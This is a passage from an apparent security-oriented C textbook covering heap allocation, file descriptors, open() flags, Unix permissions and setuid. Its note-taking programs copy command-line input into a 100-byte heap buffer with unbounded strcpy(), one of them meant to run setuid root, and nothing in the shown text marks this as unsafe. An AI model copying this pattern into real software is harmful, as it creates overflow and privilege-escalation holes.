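Most of this code is fairly self-explanatory because of the descriptive variable names. The global and static variables are declared as described earlier, and initialized counterparts are also declared. The stack variable is declared both in main() and in function() to showcase the effect of functional contexts. The heap variable is actually declared as an integer pointer, which will point to memory allocated on the heap memory segment. The malloc() function is called to allocate four bytes on the heap. Since the newly allocated memory could be of any data type, malloc() returns a void pointer, which is typecast here into an integer pointer.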

reader@hacking:~/booksrc $ gcc memory_segments.c
reader@hacking:~/booksrc $ ./a.out 
global_initialized_var is at address 0x080497ec
static_initialized_var is at address 0x080497f0

static_var is at address 0x080497f8
global_var is at address 0x080497fc

heap_var is at address 0x0804a008

stack_var is at address 0xbffff834
the function's stack_var is at address 0xbffff814
reader@hacking:~/booksrc $

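The first two initialized variables have the lowest memory addresses, since they are located in the data memory segment. The next two variables, static_var and global_var, are stored in the bss memory segment, since they aren't initialized. Their memory addresses are slightly larger than those of the previous variables, since the bss segment is located below the data segment in the memory listing (that is, at higher addresses). Since both of these memory segments have a fixed size after compilation, there is little wasted space, and the addresses aren't very far apart.

The heap variable is stored in space allocated on the heap segment, which is located just below the bss segment. Remember that memory in this segment isn't fixed, and more space can be dynamically allocated later. Finally, the last two stack_vars have very large memory addresses, since they are located in the stack segment. Memory in the stack isn't fixed either; however, this memory starts at the bottom and grows backward toward the heap segment. This allows both memory segments to be dynamic without wasting space in memory. The first stack_var, in the main() function's context, is stored in the stack segment within a stack frame. The second stack_var, in function(), has its own unique context, so that variable is stored within a different stack frame in the stack segment. When function() is called near the end of the program, a new stack frame is created to store (among other things) the stack_var for function()'s context. Since the stack grows back up toward the heap segment with each new stack frame, the memory address of the second stack_var (0xbffff814) is smaller than the address of the first stack_var (0xbffff834) found in main()'s context.

Using the Heap

Using the other memory segments is simply a matter of how you declare variables. Using the heap, however, requires a bit more effort. As previously demonstrated, allocating memory on the heap is done with the malloc() function. This function accepts a size as its only argument and reserves that much space in the heap segment, returning the address of the start of this memory as a void pointer. If malloc() can't allocate the memory for some reason, it simply returns a NULL pointer, which has a value of 0. The corresponding deallocation function is free(). This function accepts a pointer as its only argument and frees that memory space on the heap so it can be used again later. These relatively simple functions are demonstrated in heap_example.c.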

heap_example.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char *char_ptr;  // A char pointer
   int *int_ptr;    // An integer pointer
   int mem_size;

   if (argc < 2)     // If there aren't command-line arguments,
      mem_size = 50; // use 50 as the default value.
   else
      mem_size = atoi(argv[1]);

   printf("\t[+] allocating %d bytes of memory on the heap for char_ptr\n", mem_size);
   char_ptr = (char *) malloc(mem_size); // Allocating heap memory

   if(char_ptr == NULL) {  // Error checking, in case malloc() fails
      fprintf(stderr, "Error: could not allocate heap memory.\n");
      exit(-1);
   }

   strcpy(char_ptr, "This is memory is located on the heap.");
   printf("char_ptr (%p) --> '%s'\n", char_ptr, char_ptr);

   printf("\t[+] allocating 12 bytes of memory on the heap for int_ptr\n");
   int_ptr = (int *) malloc(12); // Allocated heap memory again

   if(int_ptr == NULL) {  // Error checking, in case malloc() fails
      fprintf(stderr, "Error: could not allocate heap memory.\n");
      exit(-1);
   }

   *int_ptr = 31337; // Put the value of 31337 where int_ptr is pointing.
   printf("int_ptr (%p) --> %d\n", int_ptr, *int_ptr);

   printf("\t[-] freeing char_ptr's heap memory...\n");
   free(char_ptr); // Freeing heap memory

   printf("\t[+] allocating another 15 bytes for char_ptr\n");
   char_ptr = (char *) malloc(15); // Allocating more heap memory

   if(char_ptr == NULL) {  // Error checking, in case malloc() fails
      fprintf(stderr, "Error: could not allocate heap memory.\n");
      exit(-1);
   }

   strcpy(char_ptr, "new memory");
   printf("char_ptr (%p) --> '%s'\n", char_ptr, char_ptr);

   printf("\t[-] freeing int_ptr's heap memory...\n");
   free(int_ptr); // Freeing heap memory
   printf("\t[-] freeing char_ptr's heap memory...\n");
   free(char_ptr); // Freeing the other block of heap memory 
}

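This program accepts a command-line argument for the size of the first memory allocation, with a default value of 50. It then uses the malloc() and free() functions to allocate and deallocate memory on the heap. There are plenty of printf() statements to show what is actually happening as the program executes. Since malloc() doesn't know what type of memory it's allocating, it returns a void pointer to the newly allocated heap memory, which must be typecast into the appropriate type. After every malloc() call there is an error-checking block that checks whether or not the allocation failed. If the allocation fails and the pointer is NULL, fprintf() is used to print an error message to standard error, and the program exits. The fprintf() function is very similar to printf(); however, its first argument is stderr, which is a standard file stream meant for displaying errors. This function will be explained more later, but for now it's just used as a way to display an error properly. The rest of the program is pretty straightforward.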

reader@hacking:~/booksrc $ gcc -o heap_example heap_example.c
reader@hacking:~/booksrc $ ./heap_example
        [+] allocating 50 bytes of memory on the heap for char_ptr
char_ptr (0x804a008) --> 'This is memory is located on the heap.'
        [+] allocating 12 bytes of memory on the heap for int_ptr
int_ptr (0x804a040) --> 31337
        [-] freeing char_ptr's heap memory...
        [+] allocating another 15 bytes for char_ptr
char_ptr (0x804a050) --> 'new memory'
        [-] freeing int_ptr's heap memory...
        [-] freeing char_ptr's heap memory... 
reader@hacking:~/booksrc $

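In the preceding output, notice that each block of memory has an incrementally higher address in the heap. Even though the first 50 bytes were deallocated, when 15 more bytes are requested they are placed after the 12 bytes allocated for int_ptr. The heap allocation functions control this behavior, which can be explored by changing the size of the initial memory allocation.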

reader@hacking:~/booksrc $ ./heap_example 100
        [+] allocating 100 bytes of memory on the heap for char_ptr
char_ptr (0x804a008) --> 'This is memory is located on the heap.'
        [+] allocating 12 bytes of memory on the heap for int_ptr
int_ptr (0x804a070) --> 31337
        [-] freeing char_ptr's heap memory...
        [+] allocating another 15 bytes for char_ptr
char_ptr (0x804a008) --> 'new memory'
        [-] freeing int_ptr's heap memory...
        [-] freeing char_ptr's heap memory...
reader@hacking:~/booksrc $

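If a larger block of memory is allocated and then deallocated, the final 15-byte allocation occurs in the freed memory space instead. By experimenting with different values, you can work out exactly when the allocation function chooses to reclaim freed space for new allocations. Often, simple informative printf() statements and a little experimentation reveal a great deal about the underlying system.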

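Error-Checked malloc()

In heap_example.c, every malloc() call is followed by its own error check. Even though the malloc() calls never failed in these runs, it's important to handle all potential cases when coding in C. With multiple malloc() calls, however, the error-checking code has to appear in multiple places. This tends to make the code look sloppy, and it's inconvenient if the error-checking code needs to change or if new malloc() calls are needed. Since the error-checking code is basically identical for every malloc() call, this is a perfect place to use a function instead of repeating the same instructions in several places. Take a look at errorchecked_heap.c for an example.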

errorchecked_heap.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void *errorchecked_malloc(unsigned int); // Function prototype for errorchecked_malloc()

int main(int argc, char *argv[]) {
   char *char_ptr;  // A char pointer
   int *int_ptr;    // An integer pointer
   int mem_size;

   if (argc < 2)     // If there aren't command-line arguments,
      mem_size = 50; // use 50 as the default value.
   else
      mem_size = atoi(argv[1]);

   printf("\t[+] allocating %d bytes of memory on the heap for char_ptr\n", mem_size);
   char_ptr = (char *) errorchecked_malloc(mem_size); // Allocating heap memory

   strcpy(char_ptr, "This is memory is located on the heap.");
   printf("char_ptr (%p) --> '%s'\n", char_ptr, char_ptr);
   printf("\t[+] allocating 12 bytes of memory on the heap for int_ptr\n");
   int_ptr = (int *) errorchecked_malloc(12); // Allocated heap memory again

   *int_ptr = 31337; // Put the value of 31337 where int_ptr is pointing.
   printf("int_ptr (%p) --> %d\n", int_ptr, *int_ptr);

   printf("\t[-] freeing char_ptr's heap memory...\n");
   free(char_ptr); // Freeing heap memory

   printf("\t[+] allocating another 15 bytes for char_ptr\n");
   char_ptr = (char *) errorchecked_malloc(15); // Allocating more heap memory

   strcpy(char_ptr, "new memory");
   printf("char_ptr (%p) --> '%s'\n", char_ptr, char_ptr);

   printf("\t[-] freeing int_ptr's heap memory...\n");
   free(int_ptr); // Freeing heap memory
   printf("\t[-] freeing char_ptr's heap memory...\n");
   free(char_ptr); // Freeing the other block of heap memory
}

void *errorchecked_malloc(unsigned int size) { // An error-checked malloc() function
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL) {
      fprintf(stderr, "Error: could not allocate heap memory.\n");
      exit(-1);
   }
   return ptr; 
}

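The errorchecked_heap.c program is essentially equivalent to the previous heap_example.c code, except that heap allocation and error checking have been gathered into a single function. The line void *errorchecked_malloc(unsigned int); near the top of the file is the function prototype. It tells the compiler that there will be a function called errorchecked_malloc() that expects a single unsigned integer argument and returns a void pointer. The actual function can then be defined anywhere; here it comes after main(). The function itself is simple: it takes the size in bytes to allocate and attempts to allocate that much memory with malloc(). If the allocation fails, the error-checking code prints an error and the program exits; otherwise, it returns the pointer to the newly allocated heap memory. This way, the custom errorchecked_malloc() function can be used in place of a normal malloc(), eliminating the need for repetitive error checking afterward. This should begin to highlight the usefulness of programming with functions.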
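As a further illustration of the same idea, the sketch below builds a second helper on top of the error-checked allocator. It is not from the book's source: the name ec_strdup() is hypothetical, and the use of size_t for sizes is an assumption about modern C style rather than the book's convention.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Error-checked malloc(): same logic as errorchecked_malloc(), but taking size_t.
void *errorchecked_malloc(size_t size) {
   void *ptr = malloc(size);
   if(ptr == NULL) {
      fprintf(stderr, "Error: could not allocate heap memory.\n");
      exit(-1);
   }
   return ptr;
}

// Hypothetical helper: copy a string into freshly allocated heap memory.
char *ec_strdup(const char *source) {
   size_t length = strlen(source) + 1;  // +1 for the terminating null byte
   char *copy = errorchecked_malloc(length);
   memcpy(copy, source, length);
   return copy;
}
```

Because the failure case is handled inside the allocator, a caller of ec_strdup() only has to remember to free() the result.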

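Building on Basics

Once you understand the basic concepts of C programming, the rest is fairly easy. The bulk of C's power comes from using other functions. In fact, if the functions were removed from any of the preceding programs, all that would remain are very basic statements.

File Access

There are two primary ways to access files in C: file descriptors and filestreams. File descriptors use a set of low-level I/O functions, while filestreams are a higher-level form of buffered I/O built on top of those low-level functions. Some consider the filestream functions easier to program with; however, file descriptors are more direct. In this book, the focus will be on the low-level I/O functions that use file descriptors.

The bar code on the back of this book represents a number. Because that number is unique among the books in a bookstore, the cashier can scan it at checkout and use it to look up information about the book in the store's database. Similarly, a file descriptor is a number used to reference an open file. Four common functions that use file descriptors are open(), close(), read(), and write(). All of these functions return -1 if there is an error. The open() function opens a file for reading and/or writing and returns a file descriptor. The returned descriptor is just an integer value, but it is unique among open files. The file descriptor is passed as an argument to the other functions, like a pointer to the opened file. For close(), the file descriptor is the only argument. The arguments to read() and write() are the file descriptor, a pointer to the data to read or write, and the number of bytes to read or write from that location. The arguments to open() are a pointer to the filename to open and a series of predefined flags that specify the access mode. These flags and their usage are explained in depth later, but for now let's look at a simple note-taking program that uses file descriptors: simplenote.c. This program accepts a note as a command-line argument and appends it to the file /tmp/notes. It uses several functions, including a familiar-looking error-checked heap allocation function. Other functions display a usage message and handle fatal errors. The usage() function is simply defined before main(), so it doesn't need a function prototype.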

simplenote.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <data to add to %s>\n", prog_name, filename);
   exit(0);
}

void fatal(char *);            // A function for fatal errors
void *ec_malloc(unsigned int); // An error-checked malloc() wrapper

int main(int argc, char *argv[]) {
   int fd; // file descriptor
   char *buffer, *datafile;

   buffer = (char *) ec_malloc(100);
   datafile = (char *) ec_malloc(20);
   strcpy(datafile, "/tmp/notes");

   if(argc < 2)                 // If there aren't command-line arguments,
      usage(argv[0], datafile); // display usage message and exit.
   strcpy(buffer, argv[1]);     // Copy into buffer.

   printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
   printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

   strncat(buffer, "\n", 1); // Add a newline on the end.

// Opening file
   fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
   if(fd == -1)
      fatal("in main() while opening file");
   printf("[DEBUG] file descriptor is %d\n", fd);
// Writing data
   if(write(fd, buffer, strlen(buffer)) == -1)
      fatal("in main() while writing buffer to file");
// Closing file
   if(close(fd) == -1)
      fatal("in main() while closing file");

   printf("Note has been saved.\n");
   free(buffer);
   free(datafile);
}

// A function to display an error message and then exit
void fatal(char *message) {
   char error_message[100];

   strcpy(error_message, "[!!] Fatal Error ");
   strncat(error_message, message, 83);
   perror(error_message);
   exit(-1);
}

// An error-checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL)
      fatal("in ec_malloc() on memory allocation");
   return ptr; 
}

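Apart from the strange-looking flags used in the open() function, most of this code should be readable. There are also a few standard functions that we haven't used before. The strlen() function accepts a string and returns its length. It's used together with write(), which needs to know how many bytes to write. The perror() function is short for print error; fatal() uses it to print an additional error message (if one exists) before exiting.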

reader@hacking:~/booksrc $ gcc -o simplenote simplenote.c 
reader@hacking:~/booksrc $ ./simplenote 
Usage: ./simplenote <data to add to /tmp/notes>
reader@hacking:~/booksrc $ ./simplenote "this is a test note"
[DEBUG] buffer   @ 0x804a008: 'this is a test note'
[DEBUG] datafile @ 0x804a070: '/tmp/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ cat /tmp/notes 
this is a test note
reader@hacking:~/booksrc $ ./simplenote "great, it works"
[DEBUG] buffer   @ 0x804a008: 'great, it works'
[DEBUG] datafile @ 0x804a070: '/tmp/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ cat /tmp/notes 
this is a test note
great, it works
reader@hacking:~/booksrc $
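
The same descriptor functions can read the notes back. The sketch below is only an illustration under stated assumptions: count_bytes() is a hypothetical helper that does not appear in the book's source, and unistd.h is included to declare read() and close().

```c
#include <fcntl.h>
#include <unistd.h>

// Hypothetical helper: return the number of bytes in a file, or -1 on error.
long count_bytes(const char *filename) {
   char chunk[64];
   long total = 0;
   ssize_t got;
   int fd = open(filename, O_RDONLY);   // Read-only; no O_CREAT, so no mode argument.
   if(fd == -1)
      return -1;
   while((got = read(fd, chunk, sizeof(chunk))) > 0) // read() returns 0 at end of file.
      total += got;
   if(close(fd) == -1 || got == -1)     // Report a failed close() or read().
      return -1;
   return total;
}
```

For the two notes saved above, which occupy 20 and 16 bytes including their newlines, count_bytes("/tmp/notes") would return 36.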

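The output of the program's execution is fairly self-explanatory, but a few things about the source code need further explanation. The files fcntl.h and sys/stat.h had to be included because they define the flags used with the open() function. The first set of flags is found in fcntl.h and is used to set the access mode. The access mode must use exactly one of the following three flags:

`O_RDONLY` Open file for read-only access.
`O_WRONLY` Open file for write-only access.
`O_RDWR` Open file for both read and write access.

These flags can be combined with several other optional flags using the bitwise OR operator. A few of the more common and useful ones are:

`O_APPEND` Write data at the end of the file.
`O_TRUNC` If the file already exists, truncate the file to 0 length.
`O_CREAT` Create the file if it doesn't exist.

Bitwise operations combine bits using standard logic gates such as OR and AND. When two bits enter an OR gate, the result is 1 if either the first bit or the second bit is 1. When two bits enter an AND gate, the result is 1 only if both the first bit and the second bit are 1. Full 32-bit values can use these bitwise operators to perform the logic operation on each pair of corresponding bits. The source code of bitwise.c and the program output demonstrate these bitwise operations.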

bitwise.c

#include <stdio.h>

int main() {
   int i, bit_a, bit_b;
   printf("bitwise OR operator  |\n");
   for(i=0; i < 4; i++) {
      bit_a = (i & 2) / 2; // Get the second bit.
      bit_b = (i & 1);     // Get the first bit.
      printf("%d | %d = %d\n", bit_a, bit_b, bit_a | bit_b);
   }
   printf("\nbitwise AND operator  &\n");
   for(i=0; i < 4; i++) {
      bit_a = (i & 2) / 2; // Get the second bit.
      bit_b = (i & 1);     // Get the first bit.
      printf("%d & %d = %d\n", bit_a, bit_b, bit_a & bit_b);
   } 
}

The results of compiling and executing bitwise.c are as follows.

reader@hacking:~/booksrc $ gcc bitwise.c
reader@hacking:~/booksrc $ ./a.out
bitwise OR operator  |
0 | 0 = 0
0 | 1 = 1
1 | 0 = 1
1 | 1 = 1

bitwise AND operator  &
0 & 0 = 0
0 & 1 = 0
1 & 0 = 0
1 & 1 = 1 
reader@hacking:~/booksrc $

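The flags used for the open() function have values that correspond to single bits. This way, flags can be combined using OR logic without destroying any information. The fcntl_flags.c program and its output explore some of the flag values defined in fcntl.h and how they combine with each other.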

fcntl_flags.c

#include <stdio.h>
#include <fcntl.h>

void display_flags(char *, unsigned int);
void binary_print(unsigned int);

int main(int argc, char *argv[]) {
   display_flags("O_RDONLY\t\t", O_RDONLY);
   display_flags("O_WRONLY\t\t", O_WRONLY);
   display_flags("O_RDWR\t\t\t", O_RDWR);
   printf("\n");
   display_flags("O_APPEND\t\t", O_APPEND);
   display_flags("O_TRUNC\t\t\t", O_TRUNC);
   display_flags("O_CREAT\t\t\t", O_CREAT);
   printf("\n");
   display_flags("O_WRONLY|O_APPEND|O_CREAT", O_WRONLY|O_APPEND|O_CREAT);
}

void display_flags(char *label, unsigned int value) {
   printf("%s\t: %d\t:", label, value);
   binary_print(value);
   printf("\n");
}

void binary_print(unsigned int value) {
   unsigned int mask = 0xff000000; // Start with a mask for the highest byte.
   unsigned int shift = 256*256*256; // Start with a shift for the highest byte.
   unsigned int byte, byte_iterator, bit_iterator;

   for(byte_iterator=0; byte_iterator < 4; byte_iterator++) {
      byte = (value & mask) / shift; // Isolate each byte.
      printf(" ");
      for(bit_iterator=0; bit_iterator < 8; bit_iterator++) { // Print the byte's bits.
         if(byte & 0x80) // If the highest bit in the byte isn't 0,
            printf("1");       // print a 1.
         else
            printf("0");       // Otherwise, print a 0.
         byte *= 2;         // Move all the bits to the left by 1.
      }
      mask /= 256;       // Move the bits in mask right by 8.
      shift /= 256;      // Move the bits in shift right by 8.
   } 
}

The results of compiling and executing fcntl_flags.c are as follows.

reader@hacking:~/booksrc $ gcc fcntl_flags.c 
reader@hacking:~/booksrc $ ./a.out
O_RDONLY                        : 0     : 00000000 00000000 00000000 00000000
O_WRONLY                        : 1     : 00000000 00000000 00000000 00000001
O_RDWR                          : 2     : 00000000 00000000 00000000 00000010

O_APPEND                        : 1024  : 00000000 00000000 00000100 00000000
O_TRUNC                         : 512   : 00000000 00000000 00000010 00000000
O_CREAT                         : 64    : 00000000 00000000 00000000 01000000

O_WRONLY|O_APPEND|O_CREAT       : 1089  : 00000000 00000000 00000100 01000001 
reader@hacking:~/booksrc $

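Using bit flags in combination with bitwise logic is an efficient and commonly used technique. As long as each flag is a number that has only unique bits turned on, the effect of a bitwise OR on these values is the same as adding them. In fcntl_flags.c, 1 + 1024 + 64 = 1089. This equivalence only holds when no two flags share a bit, however; if any bit is shared, OR and addition give different results.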
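Combined flags can be taken apart again with bitwise AND. The following is a minimal sketch, not code from the book: flag_is_set() and access_mode() are hypothetical helper names. It relies on O_ACCMODE, the mask POSIX defines in fcntl.h for the access-mode bits, because O_RDONLY has the value 0 in the output above and so cannot be detected with a plain AND.

```c
#include <fcntl.h>

// Return 1 if every bit of flag is set in flags, 0 otherwise.
// Note: a flag whose value is 0 (such as O_RDONLY here) always "matches".
int flag_is_set(int flags, int flag) {
   return (flags & flag) == flag;
}

// Return the access mode (O_RDONLY, O_WRONLY, or O_RDWR) stored in flags.
int access_mode(int flags) {
   return flags & O_ACCMODE;  // O_ACCMODE masks just the access-mode bits.
}
```

With the flags used by simplenote.c, O_WRONLY|O_CREAT|O_APPEND, flag_is_set() reports that O_APPEND is present and O_TRUNC is not, and access_mode() recovers O_WRONLY.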

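File Permissions

If the O_CREAT flag is used in the access mode for open(), an additional argument is needed to define the file permissions of the newly created file. This argument uses bit flags defined in sys/stat.h, which can be combined with each other using bitwise OR logic.

`S_IRUSR` Give the file read permission for the user (owner).
`S_IWUSR` Give the file write permission for the user (owner).
`S_IXUSR` Give the file execute permission for the user (owner).
`S_IRGRP` Give the file read permission for the group.
`S_IWGRP` Give the file write permission for the group.
`S_IXGRP` Give the file execute permission for the group.
`S_IROTH` Give the file read permission for other (anyone).
`S_IWOTH` Give the file write permission for other (anyone).
`S_IXOTH` Give the file execute permission for other (anyone).

If you are already familiar with Unix file permissions, those flags should make perfect sense to you. If they don't, here's a crash course in Unix file permissions.

Every file has an owner and a group. These values can be displayed using ls -l and are shown in the following output.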

reader@hacking:~/booksrc $ ls -l /etc/passwd simplenote*
-rw-r--r-- 1 root   root   1424 2007-09-06 09:45 /etc/passwd
-rwxr-xr-x 1 reader reader 8457 2007-09-07 02:51 simplenote
-rw------- 1 reader reader 1872 2007-09-07 02:51 simplenote.c 
reader@hacking:~/booksrc $

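For the /etc/passwd file, the owner is root and the group is also root. For the other two simplenote files, both the owner and the group are reader.

Read, write, and execute permissions can be turned on and off for three different fields: user, group, and other. User permissions describe what the owner of the file can do (read, write, and/or execute), group permissions describe what users in that group can do, and other permissions describe what everyone else can do. These fields are also displayed at the front of the ls -l output. First come the user read/write/execute permissions, using r for read, w for write, x for execute, and - for off. The next three characters display the group permissions, and the last three are the other permissions. In the output above, the simplenote program has all three user permissions turned on (the rwx immediately after the leading -). Each permission corresponds to a bit flag: read is 4 (100 in binary), write is 2 (010 in binary), and execute is 1 (001 in binary). Since each value contains only unique bits, a bitwise OR operation achieves the same result as adding these numbers together. These values can be added together to define permissions for user, group, and other using the chmod command.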

reader@hacking:~/booksrc $ chmod 731 simplenote.c
reader@hacking:~/booksrc $ ls -l simplenote.c
-rwx-wx--x 1 reader reader 1826 2007-09-07 02:51 simplenote.c
reader@hacking:~/booksrc $ chmod ugo-wx simplenote.c
reader@hacking:~/booksrc $ ls -l simplenote.c
-r-------- 1 reader reader 1826 2007-09-07 02:51 simplenote.c
reader@hacking:~/booksrc $ chmod u+w simplenote.c
reader@hacking:~/booksrc $ ls -l simplenote.c
-rw------- 1 reader reader 1826 2007-09-07 02:51 simplenote.c
reader@hacking:~/booksrc $

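The first command (chmod 731) gives read, write, and execute permissions to the user, since the first digit is 7 (4 + 2 + 1); write and execute permissions to the group, since the second digit is 3 (2 + 1); and only execute permission to other, since the third digit is 1. Permissions can also be added or subtracted using chmod. In the next chmod command, the argument ugo-wx means subtract write and execute permissions from user, group, and other. The final chmod u+w command gives write permission to the user.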

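In the simplenote program, the open() function uses S_IRUSR|S_IWUSR for its additional permission argument, which means the /tmp/notes file should only have user read and write permission when it is created.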

reader@hacking:~/booksrc $ ls -l /tmp/notes 
-rw------- 1 reader reader 36 2007-09-07 02:52 /tmp/notes 
reader@hacking:~/booksrc $

User IDs

Every user on a Unix system has a unique user ID number. This user ID can be displayed using the id command.

reader@hacking:~/booksrc $ id reader
uid=999(reader) gid=999(reader) groups=999(reader),4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin)
reader@hacking:~/booksrc $ id matrix
uid=500(matrix) gid=500(matrix) groups=500(matrix)
reader@hacking:~/booksrc $ id root
uid=0(root) gid=0(root) groups=0(root)
reader@hacking:~/booksrc $

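The root user, with user ID 0, is like the administrator account and has full access to the system. The su command can be used to switch to a different user, and if it is run as root, this can be done without a password. The sudo command allows a single command to be run as the root user. On the LiveCD, sudo has been configured so it can be executed without a password, for simplicity's sake. These commands provide a simple way to switch quickly between users.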

reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $ id
uid=501(jose) gid=501(jose) groups=501(jose)
jose@hacking:/home/reader/booksrc $

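As the user jose, the simplenote program will run as jose if it is executed, but it won't have access to the /tmp/notes file. This file is owned by the user reader, and it only allows read and write permission to its owner.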

jose@hacking:/home/reader/booksrc $ ls -l /tmp/notes
-rw------- 1 reader reader 36 2007-09-07 05:20 /tmp/notes
jose@hacking:/home/reader/booksrc $ ./simplenote "a note for jose"
[DEBUG] buffer   @ 0x804a008: 'a note for jose'
[DEBUG] datafile @ 0x804a070: '/tmp/notes'
[!!] Fatal Error in main() while opening file: Permission denied
jose@hacking:/home/reader/booksrc $ cat /tmp/notes
cat: /tmp/notes: Permission denied
jose@hacking:/home/reader/booksrc $ exit
exit
reader@hacking:~/booksrc $

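This is fine if reader is the only user of the simplenote program; however, there are many times when multiple users need to be able to access certain portions of the same file. For example, the /etc/passwd file contains account information for every user on the system, including each user's default login shell. The chsh command allows any user to change his or her own login shell. This program needs to be able to make changes to the /etc/passwd file, but only on the line that pertains to the current user's account. The solution to this problem in Unix is the set user ID (setuid) permission. This is an additional file permission bit that can be set using chmod. When a program with this flag is executed, it runs as the user ID of the file's owner.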

reader@hacking:~/booksrc $ which chsh
/usr/bin/chsh
reader@hacking:~/booksrc $ ls -l /usr/bin/chsh /etc/passwd
-rw-r--r-- 1 root root  1424 2007-09-06 21:05 /etc/passwd
-rwsr-xr-x 1 root root 23920 2006-12-19 20:35 /usr/bin/chsh
reader@hacking:~/booksrc $

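The chsh program has the setuid flag set, which is indicated by the s in the ls output above. Since this file is owned by root and has the setuid permission set, the program runs as the root user when any user runs it. The /etc/passwd file that chsh writes to is also owned by root and only allows the owner to write to it. The program logic in chsh is designed to only allow writing to the line in /etc/passwd that corresponds to the user running the program, even though the program is effectively running as root. This means that a running program has both a real user ID and an effective user ID. These IDs can be retrieved using the functions getuid() and geteuid(), respectively, as shown in uid_demo.c.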

uid_demo.c

#include <stdio.h>
#include <unistd.h> // Declares getuid() and geteuid()

int main() {
   printf("real uid: %d\n", getuid());
   printf("effective uid: %d\n", geteuid()); 
}

The results of compiling and executing uid_demo.c are as follows.

reader@hacking:~/booksrc $ gcc -o uid_demo uid_demo.c
reader@hacking:~/booksrc $ ls -l uid_demo
-rwxr-xr-x 1 reader reader 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $ ./uid_demo
real uid: 999
effective uid: 999
reader@hacking:~/booksrc $ sudo chown root:root ./uid_demo
reader@hacking:~/booksrc $ ls -l uid_demo
-rwxr-xr-x 1 root root 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $ ./uid_demo 
real uid: 999
effective uid: 999 
reader@hacking:~/booksrc $

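In the output for uid_demo.c, both user IDs are shown to be 999 when uid_demo is executed, since 999 is the user ID for reader. Next, the sudo command is used with the chown command to change the owner and group of uid_demo to root. The program can still be executed, since it has execute permission for other, and it shows that both user IDs remain 999, since that's still the ID of the user.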

reader@hacking:~/booksrc $ chmod u+s ./uid_demo
chmod: changing permissions of `./uid_demo': Operation not permitted
reader@hacking:~/booksrc $ sudo chmod u+s ./uid_demo
reader@hacking:~/booksrc $ ls -l uid_demo
-rwsr-xr-x 1 root root 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $ ./uid_demo 
real uid: 999
effective uid: 0 
reader@hacking:~/booksrc $

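Since the program is owned by root now, sudo must be used to change file permissions on it. The chmod u+s command turns on the setuid permission, which can be seen in the ls -l output above. Now when the user reader executes uid_demo, the effective user ID is 0 for root, which means the program can access files as root. This is how the chsh program is able to allow any user to change his or her login shell stored in /etc/passwd.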
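A program can compare the two IDs to find out whether it is running under setuid. The helpers below are a hedged sketch with hypothetical names (running_setuid() and effective_root() are not part of the book's source); they use only getuid() and geteuid().

```c
#include <sys/types.h>
#include <unistd.h>

// Return 1 if the effective user ID differs from the real user ID,
// as it does while a setuid program runs on behalf of another user.
int running_setuid(void) {
   return getuid() != geteuid();
}

// Return 1 if the process can currently act as root (effective uid 0).
int effective_root(void) {
   return geteuid() == 0;
}
```

In the last uid_demo run above (real uid 999, effective uid 0), both helpers would return 1; in the earlier runs, both would return 0.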

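This same technique can be used in a multiuser note-taking program. The next program will be a modification of the simplenote program; it will also record the user ID of each note's original author. In addition, a new syntax for #include will be introduced.

The ec_malloc() and fatal() functions have been useful in many of our programs. Rather than copy and paste these functions into each program, they can be put in a separate include file.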

hacking.h

// A function to display an error message and then exit
void fatal(char *message) {
   char error_message[100];

   strcpy(error_message, "[!!] Fatal Error ");
   strncat(error_message, message, 83);
   perror(error_message);
   exit(-1);
}

// An error-checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL)
      fatal("in ec_malloc() on memory allocation");
   return ptr;
}

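In the new program, these functions can simply be included from hacking.h. In C, when the filename for an #include is surrounded by < and >, the compiler looks for the file in the standard include paths, such as /usr/include/. If the filename is surrounded by quotes, the compiler looks in the current directory. Therefore, if hacking.h is in the same directory as a program, it can be included in that program by typing #include "hacking.h".

The new notetaker program (notetaker.c) follows. Compared with simplenote.c, the changes are the hacking.h include, the userid variable, the /var/notes path, and the code that writes the user ID ahead of each note.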

notetaker.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <data to add to %s>\n", prog_name, filename);
   exit(0);
}

void fatal(char *);            // A function for fatal errors
void *ec_malloc(unsigned int); // An error-checked malloc() wrapper

int main(int argc, char *argv[]) {
   int userid, fd; // File descriptor
   char *buffer, *datafile;

   buffer = (char *) ec_malloc(100);
   datafile = (char *) ec_malloc(20);
   strcpy(datafile, "/var/notes");

   if(argc < 2)                // If there aren't command-line arguments,
      usage(argv[0], datafile); // display usage message and exit.

   strcpy(buffer, argv[1]);  // Copy into buffer.

   printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
   printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

 // Opening the file
   fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
   if(fd == -1)
      fatal("in main() while opening file");
   printf("[DEBUG] file descriptor is %d\n", fd);

   userid = getuid(); // Get the real user ID.

// Writing data
   if(write(fd, &userid, 4) == -1) // Write user ID before note data.
      fatal("in main() while writing userid to file");
   write(fd, "\n", 1); // Terminate line.

   if(write(fd, buffer, strlen(buffer)) == -1) // Write note.
      fatal("in main() while writing buffer to file");
   write(fd, "\n", 1); // Terminate line.

// Closing file
   if(close(fd) == -1)
      fatal("in main() while closing file");

   printf("Note has been saved.\n");
   free(buffer);
